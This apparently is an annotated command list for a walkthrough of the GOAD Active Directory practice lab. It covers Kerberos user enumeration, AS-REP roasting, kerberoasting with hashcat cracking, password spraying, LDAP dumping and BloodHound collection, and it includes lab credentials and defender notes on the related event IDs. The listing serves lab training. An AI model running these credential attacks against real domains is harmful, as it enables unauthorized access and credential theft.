The commands in the guide are outdated and no longer work in most cases. Here I’ll provide updated examples that work in Kali today.
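# Updated GOAD (Game of Active Directory) lab walkthrough commands, run from Kali
# against the 10.3.10.0/24 lab range. Every line is an independent, interactive
# command; the list is not meant to run unattended as one script (it has no
# set -e and several steps need the output of the previous one).
# Credentials given as -p / -w / user:pass arguments are visible in `ps` output
# and in shell history; fine for a throwaway lab, never for real targets.
#
# Copy/paste damage repaired below: the blog rendered "--" as an en dash (–) and
# straight quotes as typographic quotes (“ ” ‘ ’); bash treats both as literal
# characters, so the affected commands failed or behaved differently.

# --- Unauthenticated network and SMB/RPC enumeration ---
nmap -Pn -p- -sC -sV -oA full_scan_goad 10.3.10.10-12,22-23
crackmapexec smb 10.3.10.11 --users
crackmapexec smb 10.3.10.11 --pass-pol
enum4linux 10.3.10.11
# "NORTH\\" expands to NORTH\ (empty user name in domain NORTH, null session).
# The original "NORTH\" escaped the closing quote and left the argument
# unterminated, so the command never parsed.
rpcclient -U "NORTH\\" 10.3.10.11 -N
net rpc group members 'Domain Users' -W 'NORTH' -I '10.3.10.11' -U '%'

# --- Build a candidate user list (first.last) from the public cast page ---
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew \
  | grep 'href="/game-of-thrones/cast-and-crew/' \
  | grep -o 'aria-label="[^"]*"' \
  | cut -d '"' -f 2 \
  | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' \
  > got_users.txt

# --- Check which candidates exist, one Kerberos AS-REQ per name ---
# Defender note: each probe is logged on the DC as event 4768 (TGT requested);
# a burst of 4768 failures with code 0x6 (client principal unknown) from one
# host is the usual signal for this enumeration.
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 10.3.10.10
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.12
# NOTE(review): 10.3.10.11 is used as the north.sevenkingdoms.local DC everywhere
# else in this listing (ldapsearch -b DC=north..., ntpdate target); the
# essos.local realm here looks like a carry-over from the line above — confirm.
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 10.3.10.11

# --- Enumeration with a known lab account / guest access ---
crackmapexec smb -u khal.drogo -p horse -d essos.local 10.3.10.12 --users
# -u 'a' -p '' only works where guest access to shares is still allowed.
crackmapexec smb 10.3.10.10-23 -u 'a' -p '' --shares

# --- AS-REP roasting: accounts with Kerberos pre-authentication disabled ---
# Defender note: these show up as 4768 events with pre-authentication type 0;
# the fix is simply re-enabling pre-auth on the affected accounts.
impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile sevenkingdoms_users.txt
cd /usr/share/wordlists
sudo gunzip rockyou.txt.gz
sudo chown kali:kali rockyou.txt
# Mode 18200 = Kerberos 5 AS-REP etype 23. The wordlist path was "rockyou.tx",
# which does not exist after the gunzip above.
hashcat -m 18200 arsephash /usr/share/wordlists/rockyou.txt
# --no-bruteforce pairs line N of the user file with line N of the password
# file instead of trying every combination; here both files are the same list.
# NOTE(review): 192.168.56.11 is the only 192.168.56.x address in this listing;
# every other command uses 10.3.10.11 for this DC — confirm which is meant.
crackmapexec smb 192.168.56.11 -u sevenkingdoms_users.txt -p sevenkingdoms_users.txt --no-bruteforce

# --- Authenticated AD user enumeration with the recovered account ---
impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
ldapsearch -H ldap://10.3.10.11 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'
# The base DN had a stray leading comma (",DC=essos,DC=local"), which is not a
# valid DN and makes the server reject the search.
ldapsearch -H ldap://10.3.10.12 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"
ldapsearch -H ldap://10.3.10.10 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"

# --- Kerberoasting: request service tickets for accounts that have an SPN ---
# Defender note: every requested ticket is a 4769 event on the DC; RC4 (etype
# 0x17) service-ticket requests for many SPNs in a short window stand out.
impacket-GetUserSPNs -request -dc-ip 10.3.10.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
# The request is repeated after syncing the clock to the DC — presumably the
# first attempt hit KRB_AP_ERR_SKEW (Kerberos tolerates 5 minutes of skew by
# default).
sudo apt install ntpdate -y
sudo ntpdate 10.3.10.11
impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople -dc-ip 10.3.10.11 -request
# Mode 13100 = Kerberos 5 TGS-REP etype 23. "--force" was given twice with en
# dashes; once is enough.
hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt

# --- With the cracked account: share access, AD-integrated DNS, BloodHound ---
crackmapexec smb 10.3.10.10-23 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
git clone https://github.com/dirkjanm/adidnsdump && cd adidnsdump
# --break-system-packages is required on current Kali (PEP 668 managed Python).
pip install . --break-system-packages
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local
# The sevenkingdoms.local and essos.local collections authenticate with a UPN
# from the north domain (trusted) and all three resolve names via the north
# DNS server (-ns 10.3.10.11).
bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -gc winterfell.north.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -gc kingslanding.sevenkingdoms.local -ns 10.3.10.11
bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local -gc meereen.essos.local -ns 10.3.10.11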